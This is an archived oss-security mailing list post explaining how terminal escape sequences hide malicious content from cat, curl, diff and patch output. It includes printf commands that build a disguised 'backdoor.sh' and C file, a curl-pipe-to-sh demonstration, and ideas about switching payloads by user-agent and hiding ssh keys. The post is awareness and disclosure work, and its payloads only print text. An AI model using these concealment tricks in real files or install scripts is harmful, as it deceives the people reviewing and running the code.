Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Thu, 17 Sep 2015 18:03:19 +0200
From: up201407890@...nos.dcc.fc.up.pt
To: oss-security@...ts.openwall.com
Subject: s/party/hack like it's 1999

Federico Bento <up201407890@...nos.dcc.fc.up.pt>

So recently i've encountered a post by Kurt Seifried of RedHat on  
oss-sec's mailing list entitled "Terminal escape sequences - the new  
XSS for admins?"
http://www.openwall.com/lists/oss-security/2015/08/11/8

This is a little misleading title, since escape sequences have been  
introduced circa 70's, so it's actually not that new.

How it technically works:
A terminal escape sequence is a special sequence of characters that is  
printed (like any other text).
If the terminal understands the sequence, it won't display the  
character-sequence, but will perform some action.

While some people might already know what i'm going to present you,  
the majority I believe doesn't, so this is mostly to raise awareness.


$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho  
doing something very nice!\n' > backdoor.sh
$ chmod +x backdoor.sh
$ cat backdoor.sh
#!/bin/bash
echo doing something very nice!
$ ./backdoor.sh
doing something evil!


As you can see, our beloved 'cat' cheated on us. Why?
Because instead of displaying the character-sequence, the escape  
sequence \033[XA (being X the number of times) performed some action.
And this action moves the cursor up X times, overwriting what is above  
it X lines.
But this doesn't affect only 'cat', it affects everything that  
interprets escape sequences.


$ head backdoor.sh
#!/bin/bash
echo doing something very nice!

$ tail backdoor.sh
#!/bin/bash
echo doing something very nice!

$ more backdoor.sh
#!/bin/bash
echo doing something very nice!


It's not over yet!


$ curl 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!

$ wget -qO - 127.0.0.1/backdoor.sh
#!/bin/bash
echo doing something very nice!


But if we pipe it into a shell...


$ curl -s 127.0.0.1/backdoor.sh|sh
doing something evil!

$ wget -qO - 127.0.0.1/backdoor.sh|sh
doing something evil!


You might be thinking "If I opened that in my browser, I would detect  
it being malicious!"
Well, think again...
One can have all sorts of fun with user-agents, something that can  
easily come to mind is verifying if the user-agent is from curl or wget,
and make them download the malicious file, if not,
redirect them to a legitimate file that looks like the original  
output. Your browser would fool you then.

I wouldn't even be surprised if most of those install scripts that  
make use of these 'pipe into sh' bullcrap abused this.
I wouldn't even be surprised if most of you were already pwned by  
escape sequences in any situation at all.
Imagine the possibilities, from hidden ssh keys on your  
authorized_keys to options hidden on your configuration files...
It's no secret, most of us rely on 'cat' to view files. I guess this  
is one black kitty, giving you bad luck.


Here's another example with a .c file


$ printf '#include <stdio.h>\n\nint main()\n{\n\tprintf("doing  
something evil\\n");\n\t/*\033[2A\n\t/* This simple program doesnt do  
much... */\n\tprintf("doing something very nice\\n");\n\treturn  
0;\n}\n' > nice.c
$ cat nice.c
#include <stdio.h>

int main()
{
	/* This simple program doesnt do much... */
	printf("doing something very nice\n");
	return 0;
}
$ gcc nice.c
$ ./a.out
doing something evil
doing something very nice


'diff' also interprets escape sequences and so do the resulting patches

going back to the first example, imagine I have a backdoored.sh that  
is backdoored, and a legit.sh that does what it's output tells us.

$ cat backdoor.sh #evil file
#!/bin/bash
echo doing something very nice!

$ cat legit.sh #actually echoes doing something very nice!
#!/bin/bash
echo doing something very nice!


$ diff -Naur backdoor.sh legit.sh
--- backdoor.sh	2015-09-17 16:25:42.985349535 +0100
+++ legit.sh	2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
  #!/bin/bash
-echo doing something very nice!
+echo doing something very nice!


$ diff -Naur backdoor.sh legit.sh > file.patch
$ patch legit.sh -R file.patch
$ chmod +x legit.sh
$ ./legit.sh
doing something evil!


Hint:
'less' doesn't interpret escape sequences unless the -r switch is used,
so stop aliasing it to 'less -r' just because there's no colored output.


s/party/hack like it's 1999

----------------------------------------------------------------
This message was sent using IMP, the Internet Messaging Program.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.